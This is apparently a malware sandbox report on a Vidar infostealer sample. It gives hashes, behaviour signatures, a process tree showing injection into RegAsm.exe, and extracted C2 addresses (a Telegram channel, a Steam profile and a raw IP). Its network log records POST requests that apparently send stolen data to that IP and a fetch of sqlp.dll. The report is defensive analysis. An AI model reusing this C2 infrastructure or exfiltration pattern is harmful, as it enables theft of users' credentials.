Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/09/2024, 13:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    283KB

  • MD5

    5c984dd83c65ae6b6f2d93a60ae40bfd

  • SHA1

    1ec1891c37d87fc565d93557a6b4d08da151badb

  • SHA256

    e4c2d3c019cf5161619d1f6ef5a76d7fb68f0cc9d4b0d004653e38bff42edf19

  • SHA512

    5f09ec740cd62c0ad5c94d53fbb8444e388ef4cf54ba4d12f1a7916048327ff3b9cd3d8cbd54d4678bacf178a93a35662b6ddf82c8049d199366ceac32c52ed9

  • SSDEEP

    6144:cf2UKkk1T+5pKHhU7mncSw2DND25SL3ttU3NAYTYsCmK0vEO:0juCeHe7mcMD25g3ttdSYsCpCEO

Score
10/10
vidardiscoveryspywarestealer

Malware Config

Extracted

Family

vidar

C2

https://t.me/edm0d

https://steamcommunity.com/profiles/76561199768374681
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Signatures

  • Detect Vidar Stealer 5 IoCs
    stealer
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
        PID:4828
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:5004
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 2296
          3⤵
          • Program crash
          PID:232
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5004 -ip 5004
      1⤵
        PID:4616

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        t.me
        RegAsm.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/edm0d
        RegAsm.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /edm0d HTTP/1.1
        Host: t.me
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Mon, 16 Sep 2024 13:40:10 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12286
        Connection: keep-alive
        Set-Cookie: stel_ssid=4a318142128895f6fe_6710074133564402445; expires=Tue, 17 Sep 2024 13:40:10 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        240.143.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.143.123.92.in-addr.arpa
        IN PTR
        Response
        240.143.123.92.in-addr.arpa
        IN PTR
        a92-123-143-240deploystaticakamaitechnologiescom
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:10 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        24.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        24.249.124.192.in-addr.arpa
        IN PTR
        Response
        24.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10024sucurinet
      • flag-us
        DNS
        72.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        72.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.254.107.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.254.107.91.in-addr.arpa
        IN PTR
        Response
        73.254.107.91.in-addr.arpa
        IN PTR
        static7325410791clients your-serverde
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 255
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 331
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 331
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 332
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 4637
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:13 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        https://91.107.254.73/sqlp.dll
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        GET /sqlp.dll HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:13 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        198.187.3.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        198.187.3.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.134.221.88.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.134.221.88.in-addr.arpa
        IN PTR
        Response
        18.134.221.88.in-addr.arpa
        IN PTR
        a88-221-134-18deploystaticakamaitechnologiescom
      • 149.154.167.99:443
        https://t.me/edm0d
        tls, http
        RegAsm.exe
        1.5kB
         19.4kB
         24
        20

        HTTP Request

        GET https://t.me/edm0d

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        1.0kB
         2.7kB
         11
        8

        HTTP Request

        GET https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        1.4kB
         622 B
         9
        6

        HTTP Request

        POST https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        1.5kB
         2.2kB
         10
        7

        HTTP Request

        POST https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        1.7kB
         6.4kB
         13
        10

        HTTP Request

        POST https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        1.5kB
         672 B
         9
        6

        HTTP Request

        POST https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/
        tls, http
        RegAsm.exe
        5.9kB
         565 B
         12
        6

        HTTP Request

        POST https://91.107.254.73/

        HTTP Response

        200
      • 91.107.254.73:443
        https://91.107.254.73/sqlp.dll
        tls, http
        RegAsm.exe
        1.0kB
         1.0kB
         8
        5

        HTTP Request

        GET https://91.107.254.73/sqlp.dll

        HTTP Response

        404
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
         90 B
         1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        t.me
        dns
        RegAsm.exe
        50 B
         66 B
         1
        1

        DNS Request

        t.me

        DNS Response

        149.154.167.99

      • 8.8.8.8:53
        209.205.72.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        209.205.72.20.in-addr.arpa

      • 8.8.8.8:53
        240.143.123.92.in-addr.arpa
        dns
        73 B
         139 B
         1
        1

        DNS Request

        240.143.123.92.in-addr.arpa

      • 8.8.8.8:53
        99.167.154.149.in-addr.arpa
        dns
        73 B
         166 B
         1
        1

        DNS Request

        99.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        24.249.124.192.in-addr.arpa
        dns
        73 B
         113 B
         1
        1

        DNS Request

        24.249.124.192.in-addr.arpa

      • 8.8.8.8:53
        72.32.126.40.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        72.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        73.254.107.91.in-addr.arpa
        dns
        72 B
         129 B
         1
        1

        DNS Request

        73.254.107.91.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        13.86.106.20.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        13.86.106.20.in-addr.arpa

      • 8.8.8.8:53
        183.59.114.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        183.59.114.20.in-addr.arpa

      • 8.8.8.8:53
        198.187.3.20.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        198.187.3.20.in-addr.arpa

      • 8.8.8.8:53
        18.134.221.88.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        18.134.221.88.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3472-0-0x0000000074B7E000-0x0000000074B7F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3472-1-0x0000000000980000-0x00000000009CA000-memory.dmp

        Filesize

        296KB

        Download

      • memory/3472-2-0x0000000005870000-0x0000000005E14000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3472-12-0x0000000074B70000-0x0000000075320000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3472-27-0x0000000074B70000-0x0000000075320000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/5004-4-0x0000000000400000-0x0000000000657000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/5004-9-0x0000000000400000-0x0000000000657000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/5004-7-0x0000000000400000-0x0000000000657000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/5004-24-0x0000000000400000-0x0000000000657000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/5004-25-0x0000000000400000-0x0000000000657000-memory.dmp

        Filesize

        2.3MB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.